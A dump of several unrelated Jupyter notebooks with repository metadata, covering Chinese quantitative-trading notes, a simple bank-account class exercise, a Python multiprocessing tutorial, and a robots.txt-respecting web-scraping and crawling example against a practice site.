home-credit-default-risk -f lgb.csv -m \"Notebook Home Credit Loan | v6 | LightGBM\"", "_____no_output_____" ], [ "#!kaggle competitions submit home-credit-default-risk -f xgboost.csv -m \"Notebook Home Credit Loan | v5 | XGBoost\"", "_____no_output_____" ], [ "#!kaggle competitions submit home-credit-default-risk -f log_reg.csv -m \"Notebook Home Credit Loan | v5 | LogisticRegression\"", "_____no_output_____" ], [ "#!kaggle competitions submit home-credit-default-risk -f random_forest.csv -m \"Notebook Home Credit Loan | v5 | RandomForest\"", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
cb1ca390906eab7c317f4a20640a5dff9f104f95
4,971
ipynb
Jupyter Notebook
Finance/见识.ipynb
Yanie1asdfg/Quant-Lectures
4e4b84cf2aff290b715a7924277335a23f5e8168
[ "MIT" ]
6
2020-12-29T07:53:46.000Z
2022-01-17T07:07:54.000Z
Finance/.ipynb_checkpoints/见识-checkpoint.ipynb
Yanie1asdfg/Quant-Lectures
4e4b84cf2aff290b715a7924277335a23f5e8168
[ "MIT" ]
null
null
null
Finance/.ipynb_checkpoints/见识-checkpoint.ipynb
Yanie1asdfg/Quant-Lectures
4e4b84cf2aff290b715a7924277335a23f5e8168
[ "MIT" ]
4
2020-12-28T03:11:26.000Z
2021-02-09T06:12:51.000Z
25.106061
160
0.456447
[ [ [ "- 广发证券之《深度学习之股指期货日内交易策略》 \n- 《宽客人生》\n- 《主动投资组合管理》\n- \n\n-------------------------------------------------------", "_____no_output_____" ], [ "量化研报只是应付客户而做的产物,对于实际交易用处不大 \n策略对于市场的参数时刻都在变化 \n策略+相应的参数调整才是完整的 \n策略本身也需要非常强的主观调整 ----------周杰 \n拿到一个静态的策略并不是一个万能钥匙,对于细节处没多大用处,挣钱完全是靠细节 \n世界不存在一种一成不变的交易体系能让你永远的挣钱 \n-------------------------------------------------------", "_____no_output_____" ], [ "**量化体系:** \n定价体系:BSM期权定价,基于基本面的股票定价...... \n因子体系:来源与CAPM理论,通过将信号元做线性回归来提供信息量 \n产品体系:最常见的FOF,MOM \n套利体系:通过协整的手段形成的一系列的策略 \n固收体系:基于收益率衍生概念对货币、外汇、债券市场的交易 \n高频体系:基于市场微观结构的验证 \n深度学习不是一个单独的策略系统,而是一种研究方法\n\n----------------------------------------------------------------------", "_____no_output_____" ], [ "--->理论先行 \n--->拒绝信息素元 \n--->连续 & 收敛 \n--->市场不完全 \n--->预测性与表征性 \n--->策略的证伪方式 \n--->策略陷阱\n\n* 量化交易不是计算机视角下的数字结果,而事实是,量化交易扎根于理论之中\n* 信息的发掘和使用构成了交易整体的具体思路\n* 信息素元是指市场无法再被细分的信息元\n* 信息元连续且收敛,挖掘因子时,连续指在一段时间内因子连续有效或连续无效,连续的过程可能不是线性的\n* 收敛是指单方向放大或缩小因子,必须在某个地方达到极值,不要求是单调的,但必须达到极值,调大一点,效果好一点,再调大一点,效果再好一点,当跳到某个值的时候,没效果了,即出现极值收敛了,不能出现因子无限大,收益无限大的情况,这种因子一定是错的\n* 所有的有效的信息元全部都是连续且收敛的\n* 市场不完全\n* 真正有效的因子是机密,一定不要是市场都知道的东西,一个很有趣的例子:运用当天的第一根K线预测当天的涨跌幅(这个因子肯定无效)\n* 天气一热,大街上的小姑凉穿裙子比较多,但不能通过大街上穿裙子的姑凉人数来预测明天的温度,温度与穿裙子女生的人数只有表征性,严格的区分这一点\n\n* 函数的单调性:函数的单调性(monotonicity)也可以叫做函数的增减性。当函数 f(x) 的自变量在其定义区间内增大(或减小)时,函数值f(x)也随着增大(或减小),则称该函数为在该区间上具有单调性。\n* 函数的连续性:连续函数是指函数y=f(x)当自变量x的变化很小时,所引起的因变量y的变化也很小。因变量关于自变量是连续变化的,连续函数在直角坐标系中的图像是一条没有断裂的连续曲线。\n-----------------------------------------------------------------------------------------", "_____no_output_____" ], [ "**量化交易的研究方法论** \n\n一切接套路 \n\n方法论意味着你的工作步骤与要求,可以理解为一个操作手册,在任一体系下每时每刻应该干什么\n\n清楚了方法论,就知道每天每时每刻该干什么,但是市场上没有任何一本书,任何一门课程讲量化研究方法论的,都是每个人总结的\n\n在研究的过程中,一定要把方法论放在前面,会让你少走很多弯路\n\n----------------------------------------------------------------------------------------------------------------------------------------------------------", "_____no_output_____" ], [ "**套利** \n内因套利\n* 期限套 \n* 跨期套 \n* 跨市场套 \n* 产业链套 \n\n关联套\n* 跨品种套\n* 衍生品套\n\n1.计算cu 和 ni的历史价格线性关系 \n2.给定一个显著性水平,通常选取**α**=5% \n3.假设其残差服从正态分布,并计算置信区间 \n4.置信区间上下限作为交易开仓的阈值 \n5.突破置信区间上限开仓做空,突破下限开仓做多 \n\n均值回归 \n极值捕捉\n---------------------------------------------------------------------", "_____no_output_____" ], [ "做量化的人没有止盈,没有止损 \n策略必须是一个严格的闭环,当前的亏损有没有超出模型的空间 \n止盈止损是主观交易法,在量化层面止盈止损是个伪命题 \n做的交易要在下单之前明确赢的可能性有多大,亏损的可能性有多大,整体的期望有多大 \n涨跌的概率之前要算清楚了才叫量化,这个可以是概率,可以是分布\n--------------------------------------------", "_____no_output_____" ], [ "**数学方面的学习:** \n* 随机过程分析\n* 时间序列\n* AI \n\n形成自己的哲学基石 \n\n-------------------------------------------------------------", "_____no_output_____" ], [ "**黑白天鹅** \n能够观察到的风险都是白天鹅 \n原油负价格从未出现之前它是黑天鹅,出现之后就不是了 \n明天外星人入侵地球,这是黑天鹅 \n黑天鹅应该在风控的层面考虑,而不是在策略层面考虑 \n-------------------------------------------------------------", "_____no_output_____" ] ] ]
[ "markdown" ]
[ [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ] ]
cb1ca8ff0f2e439294db0d0cb87561fbb21f4f79
2,551
ipynb
Jupyter Notebook
OOP_58003_LONG_QUIZ.ipynb
IanReyes2/OOP-58003
26fb8e4ef925814404e1397400a49779e2d36b94
[ "Apache-2.0" ]
null
null
null
OOP_58003_LONG_QUIZ.ipynb
IanReyes2/OOP-58003
26fb8e4ef925814404e1397400a49779e2d36b94
[ "Apache-2.0" ]
null
null
null
OOP_58003_LONG_QUIZ.ipynb
IanReyes2/OOP-58003
26fb8e4ef925814404e1397400a49779e2d36b94
[ "Apache-2.0" ]
null
null
null
26.852632
235
0.454724
[ [ [ "<a href=\"https://colab.research.google.com/github/IanReyes2/OOP-58003/blob/main/OOP_58003_LONG_QUIZ.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>", "_____no_output_____" ], [ "Bank Account", "_____no_output_____" ] ], [ [ "class Bank_Account:\n def __init__(self):\n self.balance=0\n print(\"YIEEE may sweldo na sya\")\n\n name = input(\"Enter your name: \")\n print(\"\")\n\n AccountNumber = input(\"Enter your number: \")\n print(\"Welcome Ian!\")\n\n def deposit(self):\n amount=float(input(\"Enter amount to be deposited: \"))\n self.balance += amount\n \n print(\"Amount Deposited: \",amount)\n\n def display(self):\n print(\"Net Available Balance=\",self.balance)\n\n\ns = Bank_Account()\n\ns.deposit()\ns.display()", "Enter your name: Ian\n\nEnter your number: 123456789\nWelcome Ian!\nYIEEE may sweldo na sya\nEnter amount to be deposited: 1234\nAmount Deposited: 1234.0\nNet Available Balance= 1234.0\n" ] ] ]
[ "markdown", "code" ]
[ [ "markdown", "markdown" ], [ "code" ] ]
cb1caa0c204f6f6ff17bc9292e326ce2e1e8493a
27,446
ipynb
Jupyter Notebook
concurrency/multiprocessing/Passing_Messages_to_Processes.ipynb
scotthuang1989/Python-3-Module-of-the-Week
5f45f4602f084c899924ebc9c6b0155a6dc76f56
[ "Apache-2.0" ]
2
2018-09-17T05:52:12.000Z
2021-11-09T17:19:29.000Z
concurrency/multiprocessing/Passing_Messages_to_Processes.ipynb
scotthuang1989/Python-3-Module-of-the-Week
5f45f4602f084c899924ebc9c6b0155a6dc76f56
[ "Apache-2.0" ]
null
null
null
concurrency/multiprocessing/Passing_Messages_to_Processes.ipynb
scotthuang1989/Python-3-Module-of-the-Week
5f45f4602f084c899924ebc9c6b0155a6dc76f56
[ "Apache-2.0" ]
2
2017-10-18T09:01:27.000Z
2018-08-22T00:41:22.000Z
29.043386
509
0.508963
[ [ [ "## Passing Messages to Processes", "_____no_output_____" ], [ "As with threads, a common use pattern for multiple processes is to divide a job up among several workers to run in parallel. Effective use of multiple processes usually requires some communication between them, so that work can be divided and results can be aggregated. A simple way to communicate between processes with multiprocessing is to use a Queue to pass messages back and forth. **Any object that can be serialized with pickle can pass through a Queue.**", "_____no_output_____" ] ], [ [ "import multiprocessing\n\n\nclass MyFancyClass:\n\n def __init__(self, name):\n self.name = name\n\n def do_something(self):\n proc_name = multiprocessing.current_process().name\n print('Doing something fancy in {} for {}!'.format(\n proc_name, self.name))\n\n\ndef worker(q):\n obj = q.get()\n obj.do_something()\n\n\nif __name__ == '__main__':\n queue = multiprocessing.Queue()\n\n p = multiprocessing.Process(target=worker, args=(queue,))\n p.start()\n\n queue.put(MyFancyClass('Fancy Dan'))\n\n # Wait for the worker to finish\n queue.close()\n queue.join_thread()\n p.join()", "Doing something fancy in Process-2 for Fancy Dan!\n" ] ], [ [ "A more complex example shows how to manage several workers consuming data from a JoinableQueue and passing results back to the parent process. The poison pill technique is used to stop the workers. After setting up the real tasks, the main program adds one “stop” value per worker to the job queue. When a worker encounters the special value, it breaks out of its processing loop. The main process uses the task queue’s join() method to wait for all of the tasks to finish before processing the results.", "_____no_output_____" ] ], [ [ "import multiprocessing\nimport time\n\n\nclass Consumer(multiprocessing.Process):\n\n def __init__(self, task_queue, result_queue):\n multiprocessing.Process.__init__(self)\n self.task_queue = task_queue\n self.result_queue = result_queue\n\n def run(self):\n proc_name = self.name\n while True:\n next_task = self.task_queue.get()\n if next_task is None:\n # Poison pill means shutdown\n print('{}: Exiting'.format(proc_name))\n self.task_queue.task_done()\n break\n print('{}: {}'.format(proc_name, next_task))\n answer = next_task()\n self.task_queue.task_done()\n self.result_queue.put(answer)\n\n\nclass Task:\n\n def __init__(self, a, b):\n self.a = a\n self.b = b\n\n def __call__(self):\n time.sleep(0.1) # pretend to take time to do the work\n return '{self.a} * {self.b} = {product}'.format(\n self=self, product=self.a * self.b)\n\n def __str__(self):\n return '{self.a} * {self.b}'.format(self=self)\n\n\nif __name__ == '__main__':\n # Establish communication queues\n tasks = multiprocessing.JoinableQueue()\n results = multiprocessing.Queue()\n\n # Start consumers\n num_consumers = multiprocessing.cpu_count() * 2\n print('Creating {} consumers'.format(num_consumers))\n consumers = [\n Consumer(tasks, results)\n for i in range(num_consumers)\n ]\n for w in consumers:\n w.start()\n\n # Enqueue jobs\n num_jobs = 10\n for i in range(num_jobs):\n tasks.put(Task(i, i))\n\n # Add a poison pill for each consumer\n for i in range(num_consumers):\n tasks.put(None)\n\n # Wait for all of the tasks to finish\n tasks.join()\n\n # Start printing results\n while num_jobs:\n result = results.get()\n print('Result:', result)\n num_jobs -= 1", "Creating 16 consumers\nConsumer-5: 2 * 2\nConsumer-3: 0 * 0\nConsumer-6: 3 * 3\nConsumer-8: 5 * 5\nConsumer-9: 6 * 6\nConsumer-4: 1 * 1\nConsumer-11: 8 * 8\nConsumer-18: 4 * 4\nConsumer-16: Exiting\nConsumer-12: 9 * 9\nConsumer-17: Exiting\nConsumer-7: 7 * 7\nConsumer-14: Exiting\nConsumer-15: Exiting\nConsumer-10: Exiting\nConsumer-13: Exiting\nConsumer-3: Exiting\nConsumer-5: Exiting\nConsumer-6: Exiting\nConsumer-11: Exiting\nConsumer-8: Exiting\nConsumer-9: Exiting\nConsumer-4: Exiting\nConsumer-12: Exiting\nConsumer-18: Exiting\nConsumer-7: Exiting\nResult: 0 * 0 = 0\nResult: 2 * 2 = 4\nResult: 8 * 8 = 64\nResult: 3 * 3 = 9\nResult: 6 * 6 = 36\nResult: 5 * 5 = 25\nResult: 1 * 1 = 1\nResult: 9 * 9 = 81\nResult: 4 * 4 = 16\nResult: 7 * 7 = 49\n" ] ], [ [ "## Signaling between Processes", "_____no_output_____" ], [ "The Event class provides a simple way to communicate state information between processes. An event can be toggled between set and unset states. Users of the event object can wait for it to change from unset to set, using an optional timeout value.\n\n", "_____no_output_____" ] ], [ [ "import multiprocessing\nimport time\n\n\ndef wait_for_event(e):\n \"\"\"Wait for the event to be set before doing anything\"\"\"\n print('wait_for_event: starting')\n e.wait()\n print('wait_for_event: e.is_set()->', e.is_set())\n\n\ndef wait_for_event_timeout(e, t):\n \"\"\"Wait t seconds and then timeout\"\"\"\n print('wait_for_event_timeout: starting')\n e.wait(t)\n print('wait_for_event_timeout: e.is_set()->', e.is_set())\n\n\nif __name__ == '__main__':\n e = multiprocessing.Event()\n w1 = multiprocessing.Process(\n name='block',\n target=wait_for_event,\n args=(e,),\n )\n w1.start()\n\n w1 = multiprocessing.Process(\n name='block',\n target=wait_for_event,\n args=(e,),\n )\n w1.start()\n\n \n w2 = multiprocessing.Process(\n name='nonblock',\n target=wait_for_event_timeout,\n args=(e, 2),\n )\n w2.start()\n\n print('main: waiting before calling Event.set()')\n time.sleep(3)\n e.set()\n print('main: event is set')", "wait_for_event: starting\nwait_for_event: starting\nwait_for_event_timeout: starting\nmain: waiting before calling Event.set()\nwait_for_event_timeout: e.is_set()-> False\nmain: event is set\nwait_for_event: e.is_set()-> True\nwait_for_event: e.is_set()-> True\n" ] ], [ [ "* When wait() times out it returns without an error. The caller is responsible for checking the state of the event using is_set().\n\n* a event.set() will set off all process that are waiting for this event", "_____no_output_____" ], [ "## Controlling Access to Resources", "_____no_output_____" ], [ "In situations when a single resource needs to be shared between multiple processes, a Lock can be used to avoid conflicting accesses.", "_____no_output_____" ] ], [ [ "import multiprocessing\nimport sys\n\n\ndef worker_with(lock, stream):\n with lock:\n stream.write('Lock acquired via with\\n')\n\n\ndef worker_no_with(lock, stream):\n lock.acquire()\n try:\n stream.write('Lock acquired directly\\n')\n finally:\n lock.release()\n\n\nlock = multiprocessing.Lock()\nw = multiprocessing.Process(\n target=worker_with,\n args=(lock, sys.stdout),\n)\nnw = multiprocessing.Process(\n target=worker_no_with,\n args=(lock, sys.stdout),\n)\n\nw.start()\nnw.start()\n\nw.join()\nnw.join()", "Lock acquired via with\nLock acquired directly\n" ] ], [ [ "## Synchronizing Operations", "_____no_output_____" ], [ "### Condition", "_____no_output_____" ], [ "Condition objects can be used to synchronize parts of a workflow so that some run in parallel but others run sequentially, even if they are in separate processes.", "_____no_output_____" ] ], [ [ "import multiprocessing\nimport time\n\n\ndef stage_1(cond):\n \"\"\"perform first stage of work,\n then notify stage_2 to continue\n \"\"\"\n name = multiprocessing.current_process().name\n print('Starting', name)\n with cond:\n print('{} done and ready for stage 2'.format(name))\n cond.notify_all()\n\n\ndef stage_2(cond):\n \"\"\"wait for the condition telling us stage_1 is done\"\"\"\n name = multiprocessing.current_process().name\n print('Starting', name)\n with cond:\n cond.wait()\n print('{} running'.format(name))\n\n\nif __name__ == '__main__':\n condition = multiprocessing.Condition()\n s1 = multiprocessing.Process(name='s1',\n target=stage_1,\n args=(condition,))\n s2_clients = [\n multiprocessing.Process(\n name='stage_2[{}]'.format(i),\n target=stage_2,\n args=(condition,),\n )\n for i in range(1, 3)\n ]\n\n for c in s2_clients:\n c.start()\n time.sleep(1)\n s1.start()\n\n s1.join()\n for c in s2_clients:\n c.join()", "Starting stage_2[1]\nStarting stage_2[2]\nStarting s1\ns1 done and ready for stage 2\nstage_2[2] running\nstage_2[1] running\n" ] ], [ [ "In this example, two process run the second stage of a job in parallel, but only after the first stage is done.", "_____no_output_____" ], [ "## Controlling Concurrent Access to Resources", "_____no_output_____" ], [ "Sometimes it is useful to allow more than one worker access to a resource at a time, while still limiting the overall number. For example, a connection pool might support a fixed number of simultaneous connections, or a network application might support a fixed number of concurrent downloads. A Semaphore is one way to manage those connections.", "_____no_output_____" ] ], [ [ "import random\nimport multiprocessing\nimport time\n\n\nclass ActivePool:\n\n def __init__(self):\n super(ActivePool, self).__init__()\n self.mgr = multiprocessing.Manager()\n self.active = self.mgr.list()\n self.lock = multiprocessing.Lock()\n\n def makeActive(self, name):\n with self.lock:\n self.active.append(name)\n\n def makeInactive(self, name):\n with self.lock:\n self.active.remove(name)\n\n def __str__(self):\n with self.lock:\n return str(self.active)\n\n\ndef worker(s, pool):\n name = multiprocessing.current_process().name\n with s:\n pool.makeActive(name)\n print('Activating {} now running {}'.format(\n name, pool))\n time.sleep(random.random())\n pool.makeInactive(name)\n\n\nif __name__ == '__main__':\n pool = ActivePool()\n s = multiprocessing.Semaphore(3)\n jobs = [\n multiprocessing.Process(\n target=worker,\n name=str(i),\n args=(s, pool),\n )\n for i in range(10)\n ]\n\n for j in jobs:\n j.start()\n\n while True:\n alive = 0\n for j in jobs:\n if j.is_alive():\n alive += 1\n j.join(timeout=0.1)\n print('Now running {}'.format(pool))\n if alive == 0:\n # all done\n break", "Activating 0 now running ['0']\nActivating 1 now running ['0', '1']\nActivating 2 now running ['0', '1', '2']\nActivating 3 now running ['1', '2', '3']\nNow running ['1', '2', '3']\nNow running ['1', '2', '3']\nActivating 4 now running ['1', '2', '4']\nNow running ['1', '2', '3']\nNow running ['1', '2', '3']\nActivating 5 now running ['1', '4', '5']\nNow running ['1', '4', '5']\nNow running ['1', '4', '5']\nActivating 6 now running ['1', '5', '6']\nActivating 7 now running ['1', '6', '7']\nNow running ['1', '4', '5']\nNow running ['1', '6', '7']\nActivating 8 now running ['6', '7', '8']\nActivating 9 now running ['7', '8', '9']\nNow running ['1', '6', '7']\nNow running ['6', '7', '8']\nNow running ['7', '8', '9']\nNow running ['7', '8', '9']\nNow running ['7', '8', '9']\nNow running ['7', '8', '9']\nNow running ['7', '8', '9']\nNow running ['7', '8', '9']\nNow running ['8', '9']\nNow running ['9']\nNow running ['9']\nNow running ['9']\nNow running []\n" ] ], [ [ "## Managing Shared State", "_____no_output_____" ], [ "In the previous example, the list of active processes is maintained centrally in the ActivePool instance via a special type of list object created by a Manager. The Manager is responsible for coordinating shared information state between all of its users.", "_____no_output_____" ] ], [ [ "import multiprocessing\nimport pprint\n\n\ndef worker(d, key, value):\n d[key] = value\n\n\nif __name__ == '__main__':\n mgr = multiprocessing.Manager()\n d = mgr.dict()\n jobs = [\n multiprocessing.Process(\n target=worker,\n args=(d, i, i * 2),\n )\n for i in range(10)\n ]\n for j in jobs:\n j.start()\n for j in jobs:\n j.join()\n print('Results:', d)", "Results: {0: 0, 1: 2, 3: 6, 2: 4, 4: 8, 5: 10, 6: 12, 7: 14, 8: 16, 9: 18}\n" ] ], [ [ "By creating the list through the manager, it is shared and updates are seen in all processes. Dictionaries are also supported.", "_____no_output_____" ], [ "## Shared Namespaces", "_____no_output_____" ], [ "In addition to dictionaries and lists, a Manager can create a shared Namespace.", "_____no_output_____" ] ], [ [ "import multiprocessing\n\n\ndef producer(ns, event):\n ns.value = 'This is the value'\n event.set()\n\n\ndef consumer(ns, event):\n try:\n print('Before event: {}'.format(ns.value))\n except Exception as err:\n print('Before event, error:', str(err))\n event.wait()\n print('After event:', ns.value)\n\n\nif __name__ == '__main__':\n mgr = multiprocessing.Manager()\n namespace = mgr.Namespace()\n event = multiprocessing.Event()\n p = multiprocessing.Process(\n target=producer,\n args=(namespace, event),\n )\n c = multiprocessing.Process(\n target=consumer,\n args=(namespace, event),\n )\n\n c.start()\n p.start()\n\n c.join()\n p.join()", "Before event, error: 'Namespace' object has no attribute 'value'\nAfter event: This is the value\n" ] ], [ [ "Any named value added to the Namespace is visible to all of the clients that receive the Namespace instance.", "_____no_output_____" ], [ "**It is important to know that updates to the contents of mutable values in the namespace are not propagated automatically.**", "_____no_output_____" ] ], [ [ "import multiprocessing\n\n\ndef producer(ns, event):\n # DOES NOT UPDATE GLOBAL VALUE!\n ns.my_list.append('This is the value')\n event.set()\n\n\ndef consumer(ns, event):\n print('Before event:', ns.my_list)\n event.wait()\n print('After event :', ns.my_list)\n\n\nif __name__ == '__main__':\n mgr = multiprocessing.Manager()\n namespace = mgr.Namespace()\n namespace.my_list = []\n\n event = multiprocessing.Event()\n p = multiprocessing.Process(\n target=producer,\n args=(namespace, event),\n )\n c = multiprocessing.Process(\n target=consumer,\n args=(namespace, event),\n )\n\n c.start()\n p.start()\n\n c.join()\n p.join()", "Before event: []\nAfter event : []\n" ] ], [ [ "## Process Pools", "_____no_output_____" ], [ "The Pool class can be used to manage a fixed number of workers for simple cases where the work to be done can be broken up and distributed between workers independently. The return values from the jobs are collected and returned as a list. The pool arguments include the number of processes and a function to run when starting the task process (invoked once per child).", "_____no_output_____" ] ], [ [ "import multiprocessing\n\n\ndef do_calculation(data):\n return data * 2\n\n\ndef start_process():\n print('Starting', multiprocessing.current_process().name)\n\n\nif __name__ == '__main__':\n inputs = list(range(10))\n print('Input :', inputs)\n\n builtin_outputs = map(do_calculation, inputs)\n print('Built-in:', [i for i in builtin_outputs])\n\n pool_size = multiprocessing.cpu_count() * 2\n pool = multiprocessing.Pool(\n processes=pool_size,\n initializer=start_process,\n )\n pool_outputs = pool.map(do_calculation, inputs)\n pool.close() # no more tasks\n pool.join() # wrap up current tasks\n\n print('Pool :', pool_outputs)", "Input : [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\nBuilt-in: [0, 2, 4, 6, 8, 10, 12, 14, 16, 18]\nStarting ForkPoolWorker-87\nStarting ForkPoolWorker-86\nStarting ForkPoolWorker-85\nStarting ForkPoolWorker-88\nStarting ForkPoolWorker-89\nStarting ForkPoolWorker-90\nStarting ForkPoolWorker-91\nStarting ForkPoolWorker-92\nStarting ForkPoolWorker-93\nStarting ForkPoolWorker-94\nStarting ForkPoolWorker-95\nStarting ForkPoolWorker-96\nStarting ForkPoolWorker-97\nStarting ForkPoolWorker-98\nStarting ForkPoolWorker-100\nStarting ForkPoolWorker-99\nPool : [0, 2, 4, 6, 8, 10, 12, 14, 16, 18]\n" ] ], [ [ "By default, Pool creates a fixed number of worker processes and passes jobs to them until there are no more jobs. Setting the maxtasksperchild parameter tells the pool to restart a worker process after it has finished a few tasks, preventing long-running workers from consuming ever more system resources.", "_____no_output_____" ] ], [ [ "import multiprocessing\n\n\ndef do_calculation(data):\n return data * 2\n\n\ndef start_process():\n print('Starting', multiprocessing.current_process().name)\n\n\nif __name__ == '__main__':\n inputs = list(range(10))\n print('Input :', inputs)\n\n builtin_outputs = map(do_calculation, inputs)\n print('Built-in:', builtin_outputs)\n\n pool_size = multiprocessing.cpu_count() * 2\n pool = multiprocessing.Pool(\n processes=pool_size,\n initializer=start_process,\n maxtasksperchild=2,\n )\n pool_outputs = pool.map(do_calculation, inputs)\n pool.close() # no more tasks\n pool.join() # wrap up current tasks\n\n print('Pool :', pool_outputs)", "Input : [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\nBuilt-in: <map object at 0x7f430c35dbe0>\nStarting ForkPoolWorker-101\nStarting ForkPoolWorker-102\nStarting ForkPoolWorker-103\nStarting ForkPoolWorker-104\nStarting ForkPoolWorker-105\nStarting ForkPoolWorker-106\nStarting ForkPoolWorker-107\nStarting ForkPoolWorker-108\nStarting ForkPoolWorker-109\nStarting ForkPoolWorker-110\nStarting ForkPoolWorker-111\nStarting ForkPoolWorker-112\nStarting ForkPoolWorker-113\nStarting ForkPoolWorker-114\nStarting ForkPoolWorker-115\nStarting ForkPoolWorker-116\nPool : [0, 2, 4, 6, 8, 10, 12, 14, 16, 18]\n" ] ], [ [ "The pool restarts the workers when they have completed their allotted tasks, even if there is no more work. In this output, eight workers are created, even though there are only 10 tasks, and each worker can complete two of them at a time.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
cb1cac80a50ac05ff3a0b91121b4c8e4987968ee
17,166
ipynb
Jupyter Notebook
chapter 2/web scraping.ipynb
victorqp/wswp
4a961c5a56db05437f7d682cfece299dced11485
[ "MIT" ]
null
null
null
chapter 2/web scraping.ipynb
victorqp/wswp
4a961c5a56db05437f7d682cfece299dced11485
[ "MIT" ]
null
null
null
chapter 2/web scraping.ipynb
victorqp/wswp
4a961c5a56db05437f7d682cfece299dced11485
[ "MIT" ]
null
null
null
46.901639
273
0.561925
[ [ [ "import urllib.request as urlreq\nimport urllib.error as urlerr\nimport urllib.parse as urlparse\nimport urllib.robotparser as urlrp\nfrom bs4 import BeautifulSoup\nimport re\nimport datetime\nimport time\nimport sys\nsys.path.append('../')\nfrom common.utils import *", "_____no_output_____" ], [ "url = \"http://example.webscraping.com/places/default/view/Argentina-11\"\nhtml = download(url)\nsoup = BeautifulSoup(html, \"lxml\")\ntrs = soup.find_all(attrs={'id':re.compile('places_.*__row')})\nfor tr in trs:\n td = tr.find(attrs={'class':'w2p_fw'})\n value = td.text\n print(value)", "Downloading: http://example.webscraping.com/places/default/view/Argentina-11\n\n2,766,890 square kilometres\n41,343,201\nAR\nArgentina\nBuenos Aires\nSA\n.ar\nARS\nPeso\n54\n@####@@@\n^([A-Z]\\d{4}[A-Z]{3})$\nes-AR,en,it,de,fr,gn\nCL BO UY PY BR \n" ], [ "import lxml.html\n\ntree = lxml.html.fromstring(html)\ntd = tree.cssselect('tr#places_area__row > td.w2p_fw')[0]\narea = td.text_content()\nprint(area)", "2,766,890 square kilometres\n" ], [ "FIELDS = ('area', 'population', 'iso', 'country', 'capital', 'continent',\n 'tld', 'currency_code', 'currency_name', 'phone', 'postal_code_format',\n 'postal_code_regex', 'languages', 'neighbours')\n\ndef re_scraper(html):\n results = {}\n for field in FIELDS:\n results[field] = re.search('<tr id=\"places_%s__row\">.*?<td class=\"w2p_fw\">(.*?)<\\/td>' % field, html.decode()).groups()[0]\n \n return results\n\ndef bs_scraper(html):\n soup = BeautifulSoup(html, \"lxml\")\n results = {}\n for field in FIELDS:\n results[field] = soup.find('table').find('tr', id='places_%s__row' % field).find(\n 'td', class_='w2p_fw').text\n \n return results\n\ndef lxml_scraper(html):\n tree = lxml.html.fromstring(html)\n results = {}\n for field in FIELDS:\n results[field] = tree.cssselect('table > tr#places_%s__row > td.w2p_fw' %\n field)[0].text_content()\n \n return results", "_____no_output_____" ], [ "import time\n\nNUM_ITERATIONS = 1000\n\nfor name, scraper in [('Regular expressions', re_scraper),\n ('BeautifulSoup', bs_scraper),\n ('Lxml', lxml_scraper)]:\n start = time.time()\n for i in range(NUM_ITERATIONS):\n if scraper == re_scraper:\n re.purge()\n result = scraper(html)\n assert(result['area'] == '2,766,890 square kilometres')\n end = time.time()\n print(\"%s: %.2f seconds\" % (name, end-start))", "Regular expressions: 1.61 seconds\nBeautifulSoup: 10.67 seconds\nLxml: 2.07 seconds\n" ], [ "def scrape_callback(url, html):\n if re.search('/view/', url):\n tree = lxml.html.fromstring(html)\n row = [tree.cssselect('table > tr#places_{}__row > td.w2p_fw'.format(field))[0].text_content() for field in FIELDS]\n print(url, row)", "_____no_output_____" ], [ "import csv \n\nclass ScrapeCallback:\n def __init__(self):\n self.writer = csv.writer(open('countries.csv', 'w'))\n self.fields = ('area', 'population', 'iso', 'country', 'capital', 'continent', 'tld', 'currency_code', 'currency_name', 'phone', 'postal_code_format', 'postal_code_regex', 'languages', 'neighbours')\n self.writer.writerow(self.fields)\n\n def __call__(self, url, html):\n if re.search('/view/', url):\n tree = lxml.html.fromstring(html)\n row = []\n for field in self.fields:\n row.append(tree.cssselect('table > tr#places_{}__row > td.w2p_fw'.format(field))[0].text_content())\n self.writer.writerow(row)", "_____no_output_____" ], [ "def link_crawler(seed_url, link_regex, max_depth=2, scrape_callback=None):\n crawl_queue = [seed_url]\n seen = {seed_url:0}\n throttle = Throttle(3)\n user_agent = 'victor'\n rp = urlrp.RobotFileParser()\n rp.set_url(\"http://example.webscraping.com/robots.txt\")\n rp.read()\n while crawl_queue:\n url = crawl_queue.pop()\n depth = seen[url]\n if rp.can_fetch(user_agent, url):\n throttle.wait(url)\n html = download(url, user_agent)\n if scrape_callback:\n scrape_callback(url, html)\n if depth != max_depth:\n for link in get_links(html.decode()):\n # skip all login pages\n if re.search('login|register', link):\n continue\n if re.search(link_regex, link):\n # form absolute link\n link = urlparse.urljoin(seed_url, link)\n # check if this link is already seen\n if link not in seen:\n seen[link] = depth + 1\n crawl_queue.append(link)\n else:\n print('blocked by robots.txt, ', url)\n \n return seen", "_____no_output_____" ], [ "all_links = link_crawler('http://example.webscraping.com', '/(index|view)/', scrape_callback=scrape_callback)", "Downloading: 